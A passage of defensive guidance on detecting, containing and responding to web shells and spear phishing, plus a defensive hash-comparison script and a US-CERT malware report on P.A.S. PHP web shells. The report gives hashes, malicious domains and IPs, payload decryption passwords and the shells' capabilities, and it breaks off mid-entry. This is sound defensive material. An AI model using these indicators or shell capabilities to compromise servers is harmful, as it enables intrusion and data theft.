• Conduct regular log review. Key sources should include the network and host firewalls, Intrusion Prevention System, proxy, and local event logs. Events of interest include high usage rates to suspicious IPs, odd timestamps on web files (dates that do not match previous content updates), odd connections destined for internal networks, suspicious files in internet-accessible locations, and references to key words such as cmd.exe or eval.[4] Auditing should involve an aggregator that stores and secures the logs remotely: even the best auditing on the web server is useless if the attacker can manipulate or delete the logs once they have obtained control. The logs should be protected and regularly rolled up to a centralized location for integration into a security information and event management (SIEM) system.

• Develop all content in an offline environment and maintain a hash list of all web files. 
Frequently compare the hashes of the files on the web server to the known good list 
maintained offline (an automated method is preferred). 

• Obtain regular full system backups (including snapshots if it is a virtual machine). Forensically, the known-good data these provide is extremely useful for detection: having a copy of the filesystem from before a compromise to compare against the post-compromise filesystem benefits any analysis.

• Analyze traffic flows for anomalous behaviors such as prolonged connections, data frequently being pushed to the server (e.g., commands being sent to the shell), frequent large data transfers (an indication of data exfiltration), and abnormal encryption (anything that is not SSL/TLS, or that negotiates using an unexpected certificate) as indicators of potential nefarious activity.[2]
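The hash-list comparison recommended in the Detect bullets, as an added example that is not part of the original report: it builds a SHA-256 manifest of the offline staging copy of a site, stores it as JSON to keep away from the web server, and diffs it against the live webroot, reporting added, removed and modified files. A dropped webshell shows up as an added .php file in a directory that should only hold static assets, and a backdoored page as a modified file. The directory layout, file names and contents are constructed for the demonstration.

```python
import hashlib
import json
import shutil
import tempfile
from pathlib import Path


def file_sha256(path):
    """SHA-256 of one file, read in chunks so large assets stay out of memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map every regular file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    return {
        path.relative_to(root).as_posix(): file_sha256(path)
        for path in sorted(root.rglob("*"))
        if path.is_file()
    }


def save_manifest(manifest, path):
    """Write the known-good list; keep this copy offline, never on the web server."""
    Path(path).write_text(json.dumps(manifest, indent=2, sort_keys=True))


def load_manifest(path):
    return json.loads(Path(path).read_text())


def compare_manifests(baseline, current):
    """Classify drift between the offline baseline and the live webroot."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(
            p for p in baseline if p in current and baseline[p] != current[p]
        ),
    }


def demo():
    """Constructed scenario: a staging tree is published, then the live copy is tampered with."""
    with tempfile.TemporaryDirectory() as tmp:
        staging = Path(tmp, "staging")
        live = Path(tmp, "live")
        (staging / "images").mkdir(parents=True)
        (staging / "index.php").write_text("<?php echo 'home'; ?>\n")
        (staging / "images" / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n")
        baseline = build_manifest(staging)
        save_manifest(baseline, Path(tmp, "baseline.json"))

        shutil.copytree(staging, live)
        # Simulated compromise: an existing page is altered and an unexpected
        # .php file appears in a directory that should only hold static assets.
        with open(live / "index.php", "a") as fh:
            fh.write("<?php /* unauthorized appended code */ ?>\n")
        (live / "images" / "cache.php").write_text("<?php /* unexpected file */ ?>\n")

        return compare_manifests(load_manifest(Path(tmp, "baseline.json")), build_manifest(live))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run build_manifest against the staging tree at publish time and compare_manifests from a scheduled job; any entry under "added" or "modified" that does not correspond to a change ticket is worth pulling for analysis, and the comparison should be run from a host other than the web server so a compromised server cannot rewrite the baseline.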

Contain 

• Internet facing web servers should be deployed to a DMZ. All traffic to internal networks 
from the DMZ should be significantly constrained and highly monitored. 

• Restrict outbound communications from the DMZ to all other networks. Communications 
originating in the DMZ destined for the internal network should be minimal at most (ideally 
this should never happen). An attacker who gains access to a web server in the DMZ should 
have no capability to leverage that access in order to gain direct additional access in the 
internal network. Web server communications to the internet should be restricted to http/https 
only. All other ports and protocols should be blocked. 


[1] https://helpx.adobe.com/coldfusion/community-documentation/coldfusion-lockdown-guide.html

[2] https://www.us-cert.gov/ncas/alerts/TA15-314A
• When a Domain Controller (DC) is necessary in the DMZ, it is recommended that a standalone DC and forest structure be deployed. Additionally, all accounts and resources in the DMZ instance should have no association or likeness to the internal network.

• Ensure separation of admin accounts. The web admin account should not be the same admin account that is used elsewhere on the domain.

Respond 

• When a compromise is found, reset all credentials associated with the web server (expanding to all accounts in the DMZ if the compromise is suspected to have reached the DC). This should include all user and service accounts, all domain accounts that have logged onto that host, and all local accounts, up to and including the Kerberos ticket-granting account (krbtgt) on the DC. Reset krbtgt twice, allowing at least the maximum ticket lifetime between resets, because the KDC still honors tickets encrypted under the previous krbtgt key. Depending on the circumstances, it may also be necessary to take the suspected server(s) or network offline during the remediation process.

• All server files should be wiped and restored from a known good source. The organization 
should prepare for a disaster recovery situation that includes a system compromise. Regular 
backups and offline storage of the data files should be made before being transferred to the 
DMZ production environment. 

• When all other response techniques have failed at remediating the suspected compromise, the 
server(s) should be completely rebuilt or replaced. All data reconstitution efforts should stem 
from a known good source (offline backup). 

Defending Against Spear Phishing Attacks 

Defend 

• Enforce application whitelisting on all endpoint workstations to prevent droppers or 
unauthorized software from gaining execution on endpoints. Many phishing attacks involve 
an executable that is dropped and installed on the victim’s machine. Application Whitelisting 
will allow the organization to monitor programs and allow only those that are on the 
approved whitelist to execute. This would help to stop the initial attack, even if the user has 
clicked the link or opened a malicious attachment. There are many baseline rulesets that 
come with the vendor product, but the organization should ensure that at least the user Temp 
directories are blocked for execution since this is where numerous phishing emails attempt to 
drop and execute malware. 

• Disable macros in Office products. Macros are a common method for executing code through an attached Office document. Macros were often used as a means of initial exploitation in the late 1990s and early 2000s and have seen a recent resurgence in frequency of use. Some Office products allow macros that originate from outside the organization to be disabled while internal ones still run, a hybrid approach for organizations that depend on the legitimate use of macros. For Windows, specific settings can be configured to block Internet-originated macros from running. This can be done in the Group Policy Administrative Templates for each of the associated Office products (specifically Word, Excel, and PowerPoint). For example, to enable the policy setting for Microsoft Word 2016, in the Group Policy Management Editor, select: User Configuration > Administrative Templates > Microsoft Word 2016 > Word Options > Security > Trust Center > Block macros from running in Office files from the Internet.[3]

• Utilize up to date web browsers on the network for increased security enhancements. These 
improvements may include a sandboxing feature that would allow the browser to contain any 
malicious content and protect the endpoint if an emailed link is clicked. 

• Deploy web and email filters on the network and configure these devices to scan for known bad domains, sources, and addresses, blocking these before messages are received and downloaded. This action will help to reduce the attack surface at the network's first level of defense. In addition, attachments should be filtered: the network defenses should only allow approved extensions to pass through to the email client. Executables (.exe), scripting extensions (including .bat, .js, and .ps1) and other executable extensions should be blocked.

• Scan all emails, attachments, and downloads both on host and at the mail gateway with a 
reputable antivirus solution that includes cloud reputation services. Taking advantage of 
cloud reputation advancements provides rapid response capabilities and the integration of a 
broad base of cyber defense intelligence. 

• Organizations should ensure that they have disabled HTML from being used in emails, as 
well as disabling links. Everything should be forced to plain text. This will reduce the 
likelihood of potentially dangerous scripts or links being sent in the body of the email, and 
also will reduce the likelihood of a user just clicking something without thinking about it. 
With plain text, the user would have to go through the process of either typing in the link or 
copying and pasting. This additional step will allow the user an extra opportunity for thought 
and analysis before clicking on the link. 

• Establish a training mechanism to inform end users on proper email and web usage as well as 
common indicators of phishing to be aware of. This training should be done at least annually 
and should include a test that is scored and available for viewing by management and/or the 
IT Security department. The training should inform users what suspicious emails look like, 
what to do when they suspect phishing, as well as explain what they should post on any 
websites in terms of personally identifiable information (PII) that may be used for phishing 
campaigns (including email addresses, job titles, names, etc.). Consider real life interactive 
training simulations where users are sent suspicious emails on a semi regular basis and 
subsequently redirected to a phishing training site should they fail to adhere to the 
organization’s best practices and policies. 

Detect 

• Monitor event logs, email logs, and firewall logs for any indicators of a potential attack. These could include emails from suspicious domains, installation of programs on machines that are unusual or not approved, unusual call-outs to the internet from Office products, non-SMTP traffic from the email client, strange child processes under the parent Office process, or spoofed domains sending or receiving traffic from the network. Strange traffic or behavior (e.g., spamming others) should also be looked for in the various logs; it is a strong indicator that machine(s) are compromised in some way.

[3] https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/

• Using the antivirus software that is installed on the mailbox server and all of the clients, 
review the alerts and logs regularly for any activity on the network. The sooner detection can 
take place, the sooner remediation steps can start, and the amount of damage can be 
minimalized. 

• Users play an important role in the detection of spear phishing if they understand the proper 
reporting procedures of the organization. Users should be able to identify the correct 
handling and alerting procedure that the users should follow for any suspicious email they 
receive. 

• Using the logs from the organization's firewalls, filters, security devices, and workstations, administrators should always ensure that their whitelisted and blacklisted domains are up to date. Admins should also check DoD blacklists for known bad domains and add these to their filters as well. Using these logs and lists, the organization may benefit from other incidents that have occurred to help in the future.

Contain 

• Utilize application containment products that can be used to prevent the downloading and 
propagation of malicious software on the network. If the organization is using some form of 
web email, the browser must be containerized. If the organization is using a program for 
email (e.g., Microsoft Outlook or Mozilla Thunderbird), then that program should be 
containerized for protection. The Application Containment will open the browser or email 
program in its own Virtual Machine and isolate it from the rest of the system. This allows the 
execution of potential malware in a sandboxed environment so the host system is protected. 

• Implement front-end and back-end email servers when running on-site instantiations of mail services. Having a front-end server gives the organization an extra layer of protection on the network, since the front-end server contains no user data and allows a firewall to be placed before the back-end server. This is also safer and more convenient for any web-accessed email, since web traffic is not allowed directly into the network; the front end protects from denial-of-service attacks and authenticates requests before proxying them to the back-end server.[4]

• Control where and when an administrator can log on, as well as what they can do when logged onto a system. This can minimize the damage of a spear phishing attack. Admins should never be allowed to browse the internet, nor should they be allowed to open any email program. This will reduce the likelihood of an accidental click or download of a program that could be malicious. It also reduces the chance that a successful attacker gains admin privileges immediately upon gaining access to the system. Organizations can accomplish this restriction a number of ways, including application whitelisting, VLAN separation, dedicated administrator boxes, etc.

[4] https://technet.microsoft.com/en-us/library/bb124804(v=exchg.65).aspx

• Ensure that standard user accounts are not a part of the local administrators group. The local administrator account should also be denied network access, and all built-in local administrator accounts should have a unique password value. It is a common tactic to look for local administrator credentials as a method of expanding access across the network. Making these values unique for each machine and denying that account network access removes the attacker's capability to easily expand access using the same credentials.[5]

Respond 

• If a phishing email is discovered or suspected, the organization needs to start their normal 
investigation procedures. It may be as simple as deleting that email and updating the email 
filter to prevent this address/domain from sending to the organization again, but it could also 
trigger a normal incident response. If the email contained a link that was clicked, an 
attachment that was downloaded, or a program that was executed, the organization may have 
to remove any malicious content, discover the extent of the possible spread, detail any 
exfiltration of data, or even remove the affected machine(s) or rebuild them. 

• Reset user credentials and all credentials associated with all compromised boxes. This should 
include services accounts and machine accounts as well as the supporting Kerberos tickets. 

• Monitor all accounts associated with the spear-phishing event. User accounts who are 
suspected to have been the victim of a successful phishing campaign should be forensically 
monitored for abnormal behaviors including unusual connections to non-standard resources, 
attempts to elevate privileges, enumeration behaviors on the local host machine as well as 
remote systems, and attempts to execute odd programs or applications. 


[5] https://www.microsoft.com/en-us/download/details.aspx?id=36036
NCCIC 
US-CERT 
NATIONAL CYBERSECURITY AND COMMUNICATIONS INTEGRATION CENTER 
UNITED STATES COMPUTER EMERGENCY READINESS TEAM 


Malware Initial Findings Report (MIFR) - 10105049-Update2 
2017-01-23 


Notification 


This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties 
of any kind regarding any information contained within. The DHS does not endorse any commercial product or service, referenced in this 
bulletin or otherwise. 

This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no 
foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, 
TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see 
http://www.us-cert.gov/tlp/. 


Summary 

Description 

This report is an update to MIFR-10105049 and provides additional analysis of the artifacts identified in the NCCIC Joint Analysis Report 
(JAR 16-20296) dated December 19, 2016. 

The artifacts analyzed in this report include 17 PHP files, 3 executables and 1 RTF file. 


The PHP files are web shells designed to provide a remote user an interface for various remote operations. The RTF file is a malicious 
document designed to install and execute a malicious executable. 


Files Processed: 21 

MD5 (SHA256) 

10b1306f322a590b9cef4d023854b850 (0576cd0e9406e642c473cfa9cb67da4bc4963e0fd6811bb09d328d71b36faa09) 
128cc715b25d0e55704ed9b4a3f2ef55 (0fd05095e5d2fa466bef897105dd943de29f6b585ba68a7bf58148767364e73e) 
1ec7f06f1ee4fa7cecd17244eec24e07 (a0c00aca2f34c1f5ddcf36be2ccca4ce63b38436faf45f097d212c59d337a806) 
38f7149d4ec01509c3a36d4567125b18 (7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf) 
617ba99be8a7d0771628344d209e9d8a (9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5) 
66948b04173b523ca773c3073afb506d (449e7a7cbc393ae353e8e18b5c31d17bb13235d0c07e9e319137543608749602) 
70f93f4f17d0e46137718fe59591dafb (bd7996752cac5d05ed9d1d4077ddf3abcb3d291321c274dbcf10600ab45ad4e4) 
78abd4cdccab5462a64ab4908b6056bd (6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46) 
7fce89d5e3d59d8e849d55d604b70a6f (2d5afec034705d2dc398f01c100636d51eb446f459f1c2602512fd26e86368e4) 
81f1af277010cb78755f08dfcc379ca6 (ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e) 
8f154d23ac2071d7f179959aaba37ad5 (55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641) 
93f512e2d9d00bf0bcf1e03c6898cb1e (249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e) 
a5e933d849367d623d1f2692b6691bbf (7dac01e818bd5a01fe75c3324f6250e3f51977111d7b4a94e41307bf463f122e) 
ae7e3e531494b201fbf6021066ddd188 (9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0) 
bfcb50cffca601b33c285b9f54b64cb1 (da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8) 
c3e23ef7f5e41796b80ca9e59990fe9c (20f76ada1721b61963fa595e3a2006c96225351362b79d5d719197c190cd4239) 
dc4594dbeafbc8edfa0ac5983b295d9b (9376e20164145d9589e43c39c29be3a07ecdfd9c5c3225a69f712dc0ef9d757f) 
e80f92faa5e11007f9ffea6df2297993 (3bd682bb7870d5c8bc413cb4e0cc27e44b2358c8fc793b934c71b2a85b8169d7) 
eddfe110da553a3dc721e0ad4ea1c95c (ae67c121c7b81638a7cb655864d574f8a9e55e66bcb9a7b01f0719a05fab7975) 
f3ecf4c56f16d57b260b9cf6ec4519d6 (1343c905a9c8b0360c0665efa6af588161fda76b9d09682aaf585df1851ca751) 
fc45abdd5fb3ffa4d3799737b3f597f4 (d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38) 


Domains Identified: 9 

private.directinvesting.com 
cderlearn.com 
wilcarobbe.com 
one2shoppee.com 
ritsoperrol.ru 
littjohnwilhap.ru 
insta.reduct.ru 
editprod.waterfilter.in.ua 
mymodule.waterfilter.in.ua/system/logs/xtool.exe 
IPs Identified: 5 

204.12.12.40 
209.236.67.159 
146.185.161.126 
176.114.0.120 
176.114.0.157 
Files 


249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e 


Details 

Name      249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e 
Size      21522 
Type      PHP script, ASCII text, with very long lines, with CRLF, LF line terminators 
MD5       93f512e2d9d00bf0bcf1e03c6898cb1e 
SHA1      b7c7446dc3c97909705899e3dcffc084081b5c9f 
ssdeep    384:bx6Nx4A8ZPJ8s5o80bOls+AMBkxM5ZTSzuSizpxf18veznDt1Sxuunv:bx60A2PqsW8s7sMB/XTSfizpv+uunv 
Entropy   6.11147480451 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.aar 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Avira                 PHP/Agent.12663 
Microsoft             Backdoor:PHP/Fobushell.D 
Ahnlab                PHP/Webshell 
ESET                  PHP/Agent.IB trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Backdoor.PHP.Fobushell 


Relationships 

(F) 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e (93f51)   Related_To   (S) Interface for PAS v.3.1.0 
(F) 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e (93f51)   Related_To   (F) da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8 (bfcb5) 
(F) 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e (93f51)   Related_To   (F) 20f76ada1721b61963fa595e3a2006c96225351362b79d5d719197c190cd4239 (c3e23) 
(F) 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e (93f51)   Related_To   (F) 7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf (38f71) 
(F) 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e (93f51)   Related_To   (F) ae67c121c7b81638a7cb655864d574f8a9e55e66bcb9a7b01f0719a05fab7975 (eddfe) 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. 
At runtime the payload is decoded and decrypted using a combination of base64_decode and a password. 

Analysis indicates that the web shell is accessed and executed through a browser by a remote user. The file prompts the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 

The password "root" was used to decrypt the payload. The decrypted payload contains a PHP web shell and has been identified as P.A.S. 
v.3.1.0. This web shell is a backdoor that, once installed on the compromised system, provides a remote user an interface (see Screenshot) 
for various remote operations, such as a file explorer, searcher, SQL client, network tools, command shell access, and server information 
features. The following are some of the P.A.S. web shell capabilities: 

-Begin Capabilities- 

View compromised server information. 

File manager (copy, rename, move, download, upload, delete, jump, create files and folders). 

Search files, objects, directories, and text in files. 

SQL client to log in and dump databases and tables. 

Network console with bind-port, back-connect, and port-scanner functions. 

Command line console to execute commands. 

Execute PHP code. 

-End Capabilities- 


The P.A.S. v.3.1.0 web shell interface is shown in image 1.0. 

Screenshots 

• Interface for PAS v.3.1.0 


[Image 1.0: screenshot of the P.A.S. v.3.1.0 web shell interface (server information, file manager and tool menus); the image itself is not reproduced in this text] 

da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8 


Details 

Name      da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8 
Size      21377 
Type      PHP script, ASCII text, with very long lines 
MD5       bfcb50cffca601b33c285b9f54b64cb1 
SHA1      efcc0d8e10072b50deeca9592c76bc90f4d18ce 
ssdeep    384:0x6Nx4A8ZPJ8s5o80bOls+AMBkxM5ZTSzuSizpxf18veznDt1Sxuunv:0x60A2PqsW8s7sMB/XTSfizpv+uunv 
Entropy   6.10042530063 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
VirIT                 Trojan.PHP.Shell.JB 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.aar 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Microsoft             Backdoor:PHP/Fobushell.D 
Ahnlab                PHP/Webshell 
ESET                  PHP/Agent.IB trojan 
NANOAV                Trojan.Script.Crypt.dsonvo 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Relationships 

(F) da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8 (bfcb5)   Related_To   (F) 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e (93f51) 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. The 
password "avto" was used to decrypt the payload. The decrypted payload contains a PHP web shell and has been identified as P.A.S. 
v.3.1.0. This file and 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e have the same functionality. 


20f76ada1721b61963fa595e3a2006c96225351362b79d5d719197c190cd4239 


Details 

Name      20f76ada1721b61963fa595e3a2006c96225351362b79d5d719197c190cd4239 
Size      21377 
Type      PHP script, ASCII text, with very long lines 
MD5       c3e23ef7f5e41796b80ca9e59990fe9c 
SHA1      0a3f7e0d0729b648d7bb6839db13c97f0b741773 
ssdeep    384:JliH2ER39l1Vv+klPEWWjYc+CmJNHKblvcDSRRjqSA93DuxuXvWxUg:Jly2ER3CL+khWUYcsJtMcDiuSA93DuxD 
Entropy   6.10091164773 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
VirIT                 Trojan.PHP.Shell.LV 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.aaw 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Avira                 PHP/Agent.12662 
Microsoft             Backdoor:PHP/Fobushell.D 
Ahnlab                PHP/Webshell 
ESET                  PHP/Kryptik.AJ trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Relationships 

(F) 20f76ada1721b61963fa595e3a2006c96225351362b79d5d719197c190cd4239 (c3e23)   Related_To   (F) 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e (93f51) 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. The 
password "123123" was used to decrypt the payload. The decrypted payload contains a PHP web shell and has been identified as P.A.S. 
v.3.1.0. This file and 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e have the same functionality. 


7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf 


Details 

Name      7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf 
Size      21633 
Type      PHP script, ASCII text, with very long lines, with CRLF line terminators 
MD5       38f7149d4ec01509c3a36d4567125b18 
SHA1      d1828dce4bf476ca07629e1613dd77c3346e2c5a 
ssdeep    384:0y6t/9+e9BhShtzX3vOjbkMlspeMucuA4ScHCpMO1LmMoVID+a5XHEuz8v:0y6L+4BlhhX/6IMyn5uMcHCpbkuz8v 
Entropy   6.12095270355 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
VirIT                 Trojan.PHP.Shell.JB 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.abc 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Avira                 PHP/Agent.1266 
Microsoft             Backdoor:PHP/Fobushell.D 
Ahnlab                PHP/Webshell 
ESET                  PHP/Agent.IB trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Relationships 

(F) 7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf (38f71)   Related_To   (F) 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e (93f51) 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. The 
password "avto" was used to decrypt the payload. The decrypted payload contains a PHP web shell and has been identified as P.A.S. 
v.3.1.0. This file and 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e have the same functionality. 


ae67c121c7b81638a7cb655864d574f8a9e55e66bcb9a7b01f0719a05fab7975 


Details 

Name      ae67c121c7b81638a7cb655864d574f8a9e55e66bcb9a7b01f0719a05fab7975 
Size      21121 
Type      PHP script, ASCII text, with very long lines, with no line terminators 
MD5       eddfe110da553a3dc721e0ad4ea1c95c 
SHA1      6b178cc9d630345356b9341613cd83bd588192e9 
ssdeep    384:/YO/kOzhJ38bvqoWksNj4ICKIml6KDzXpofabpTACAXDDe9GDtWNmu:/YlkOzhJs1WkqlCKsOofocCAXDDe9etO 
Entropy   6.08010194218 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-1642041 
Kaspersky             Backdoor.PHP.Agent.aat 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Microsoft             Backdoor:PHP/Fobushell.D 
Ahnlab                PHP/Webshell 
ESET                  PHP/Kryptik.AJ trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Relationships 

(F) ae67c121c7b81638a7cb655864d574f8a9e55e66bcb9a7b01f0719a05fab7975 (eddfe)   Related_To   (F) 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e (93f51) 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. The 
password "123123" was used to decrypt the payload. The decrypted payload contains a PHP web shell and has been identified as P.A.S. 
v.3.1.0. This file and 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e have the same functionality. 


6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46 


Details 

Name      6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46 
Size      21191 
Type      PHP script, ASCII text, with very long lines 
MD5       78abd4cdccab5462a64ab4908b6056bd 
SHA1      1a42bc32bdfeb468e6a98f9b69514adb7cc963ae 
ssdeep    384:3cKqZSUbR58RkpmzijNeoBtqT/juu+/iSeCIJTYZaPKWFbNx:sKqZ7dCupmzqN3K7jsFDTTeaX1Nx 
Entropy   6.10207869759 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.abe 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Microsoft             Backdoor:PHP/Fobushell.G 
ESET                  PHP/Kryptik.AJ trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Relationships 

(F) 6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46 (78abd)   Related_To   (S) Interface for PAS v.3.0.10 
(F) 6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46 (78abd)   Related_To   (F) d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38 (fc45a) 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. The 
password "we kome" was used to decrypt the payload. The decrypted payload contains a PHP web shell and has been identified as P.A.S. 
v.3.0.10. This version (see Screenshot) and v.3.1.0 have similar functionality, except that v.3.0.10 has safeMode, open base directory, and 
disable functionality. The P.A.S. v.3.0.10 web shell interface is shown in image 2.0. 

Screenshots 

• Interface for PAS v.3.0.10 



d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38 


Details 

Name      d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38 
Size      21191 
Type      PHP script, ASCII text, with very long lines 
MD5       fc45abdd5fb3ffa4d3799737b3f597f4 
SHA1      adf649354ff4d1812e7de745214362959e0174b1 
ssdeep    384:ccKqZSUbR58RkpmzijNeoBtqT/juu+/iSeCIJTYZaPKWFbNUbxwx:pKqZ7dCupmzqN3K7jsFDTTeaX1NUbxG 
Entropy   6.1021796546 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
NetGate               Trojan.Win32.Malware 
F-secure              Backdoor.PHP.AYP 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.abe 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Avira                 PHP/Kryptik.AA 
Microsoft             Backdoor:PHP/Fobushell.G 
Ahnlab                PHP/Webshell 
ESET                  PHP/Kryptik.AJ trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Relationships 

(F) d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38 (fc45a)   Related_To   (F) 6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46 (78abd) 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. The 
password "123123" was used to decrypt the payload. The decrypted payload contains a PHP web shell and has been identified as P.A.S. 
v.3.0.10. This file and 6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46 have the same functionality. 


0576cd0e9406e642c473cfa9cb67da4bc4963e0fd6811bb09d328d71b36faa09 


Details 

Name      0576cd0e9406e642c473cfa9cb67da4bc4963e0fd6811bb09d328d71b36faa09 
Size      21633 
Type      PHP script, ASCII text, with very long lines, with CRLF line terminators 
MD5       10b1306f322a590b9cef4d023854b850 
SHA1      eac98f414abd9e6a39ce96f5547284c371a30a74 
ssdeep    384:aflOAr6OucUytsS8UdzMV3u2SmsyCDHEToBCGIbGA3taDPWA+0BWdL1v:afUAr6OJB18Cc3u2jseTo/cGA3taD+Ae 
Entropy   6.1212580823 


Antivirus 

